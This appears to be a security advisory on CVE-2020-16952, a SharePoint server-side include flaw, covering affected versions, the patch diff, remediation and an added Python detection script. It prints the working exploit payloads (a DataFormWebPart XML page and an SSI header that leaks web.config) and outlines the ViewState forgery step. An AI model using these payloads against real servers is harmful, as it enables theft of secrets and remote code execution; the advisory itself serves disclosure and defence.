Update October 14, 2020: A Metasploit module exploiting CVE-2020-16952 has been published and contains remote check logic as well as supplementary exploitation details.
Description
On Tuesday, October 13, as part of the October 2020 Patch Tuesday release, Microsoft published a security advisory for CVE-2020-16952, a server-side include (SSI) vulnerability in Microsoft SharePoint. The bug is exploitable by an authenticated user with page creation privileges, which is a standard permission in SharePoint, and allows the leaking of an arbitrary file, notably the application’s web.config file, which can be used to trigger remote code execution (RCE) via .NET deserialization. CVE-2020-16952 carries a CVSSv3 base score of 8.6.
Steven Seeley, the researcher who discovered and disclosed the vulnerability to Microsoft, published an advisory of his own with the vulnerability’s technical details. Seeley’s advisory includes a proof-of-concept (PoC) Python exploit that leverages the vulnerability to leak the web.config file, extract the ViewState validation key, and forge a malicious ViewState that will be deserialized by the application. Using a .NET gadget chain from ysoserial.net, the exploit is able to execute an arbitrary command as the SharePoint user.
An easily available proof-of-concept makes CVE-2020-16952 an impending threat. There are no reports of exploitation in the wild as of October 13, 2020.
Affected products
- Microsoft SharePoint Foundation 2013 Service Pack 1
- Microsoft SharePoint Enterprise Server 2016
- Microsoft SharePoint Server 2019
Rapid7 analysis
CVE-2020-16952 exists within the CreateChildControls() method in the Microsoft.SharePoint.WebPartPages.DataFormWebPart class and is well-documented in Seeley’s exploit.
Exploitation of the vulnerability is straightforward and begins with NTLM authentication over HTTP. After authentication has succeeded, an HTTP PUT request containing the following XML is sent to /poc.aspx (or any page the attacker is able to create). This is used to establish the source of the server-side include (SSI), which is the HTTP header 360Vulcan (or a header of the attacker’s choosing).
<WebPartPages:DataFormWebPart runat="server">
  <ParameterBindings>
    <ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />
  </ParameterBindings>
  <xsl>
    <xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
      <xsl:param name="ssi" />
      <xsl:template match="/">
        <xsl:value-of select="$ssi" disable-output-escaping="yes" />
      </xsl:template>
    </xsl:stylesheet>
  </xsl>
</WebPartPages:DataFormWebPart>
Next, a GET request containing the 360Vulcan header is sent to /poc.aspx in order to trigger the SSI and leak SharePoint’s web.config file. The header can be seen below.
360Vulcan: <form runat="server" /><!--#include virtual="/web.config"-->
Finally, using the ViewState validation key extracted from web.config, the attacker is able to forge their own ViewState containing ysoserial.net gadgets and execute a command of their choosing.
The patch for CVE-2020-16952 enables blockServerSideIncludes in the VerifyControlOnSafeList() call within CreateChildControls():
- EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, false);
+ EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, true);

The flag being enabled is the last parameter of VerifyControlOnSafeList(), which defaults to false in the method's signature:

internal static void VerifyControlOnSafeList(string dscXml, RegisterDirectiveManager registerDirectiveManager, SPWeb web, bool blockServerSideIncludes = false)

SharePoint is a high-value attack target and has seen a number of high-severity vulnerabilities patched in recent months. It is likely that active exploitation will occur within a relatively short time frame; it was trivial for Rapid7 researchers to validate the vulnerability's exploitability and weaponize Seeley's PoC.
Guidance
Since an exploit has been released, Rapid7 researchers recommend applying Microsoft’s patch immediately. CVE-2020-16952 poses higher risk for multi-tenant environments—i.e., multiple organizations using the same SharePoint and/or Active Directory environment.
For patching information, please see KB4486694 for SharePoint 2013, KB4486677 for SharePoint 2016, and KB4486676 for SharePoint 2019.
Defenders can detect this exploit variant by inspecting HTTP request headers for the string runat="server" (the header name itself is attacker-chosen, so match on header values rather than on the 360Vulcan name used in the PoC), and by auditing SharePoint page creations.
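The following is an added detection example, not code from Rapid7 or from Seeley's PoC. It parses raw HTTP requests (as a WAF or reverse proxy would capture them; the sample requests, header names and paths are constructed) and flags the two indicators named above: an SSI payload in any request header value, and a PUT that plants an .aspx page.

```python
import re
from typing import Dict, List, Tuple

# Indicators from the guidance above: the exploit variant carries an SSI payload
# in an arbitrary request header, and first plants a page with an HTTP PUT.
RUNAT_RE = re.compile(r'runat\s*=\s*["\']?server', re.IGNORECASE)
SSI_RE = re.compile(r'<!--\s*#include\b', re.IGNORECASE)
PAGE_RE = re.compile(r'\.aspx(\?|$)', re.IGNORECASE)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into (method, path, headers); header names are lowercased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split()
    method = parts[0] if parts else ""
    path = parts[1] if len(parts) > 1 else ""
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def findings(raw: str) -> List[str]:
    """Return detection findings for one request; an empty list means nothing was flagged."""
    method, path, headers = parse_request(raw)
    out: List[str] = []
    # Match on header values only: the header name (360Vulcan in the PoC) is attacker-chosen.
    for name, value in headers.items():
        if RUNAT_RE.search(value) or SSI_RE.search(value):
            out.append(f"ssi-in-header:{name}")
    # Page-creation audit: the PoC plants its page with a PUT to an .aspx path.
    if method.upper() == "PUT" and PAGE_RE.search(path):
        out.append(f"page-put:{path}")
    return out


# Constructed sample requests (hypothetical host and paths, not real captures).
BENIGN = "GET /sites/team/default.aspx HTTP/1.1\r\nHost: sp.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
TRIGGER = ("GET /poc.aspx HTTP/1.1\r\nHost: sp.example\r\n"
           "360Vulcan: <form runat=\"server\" /><!--#include virtual=\"/web.config\"-->\r\n\r\n")
PLANT = "PUT /poc.aspx HTTP/1.1\r\nHost: sp.example\r\nContent-Type: text/xml\r\n\r\n<WebPartPages:DataFormWebPart/>"

if __name__ == "__main__":
    for sample in (BENIGN, TRIGGER, PLANT):
        print(parse_request(sample)[:2], findings(sample))
```

Note that IIS's default W3C log fields do not record arbitrary request headers, so this check needs request captures from a proxy, WAF or a custom IIS logging field rather than the standard access log.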
References
- https://srcincite.io/advisories/src-2020-0022/
- https://srcincite.io/pocs/cve-2020-16952.py.txt
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Oct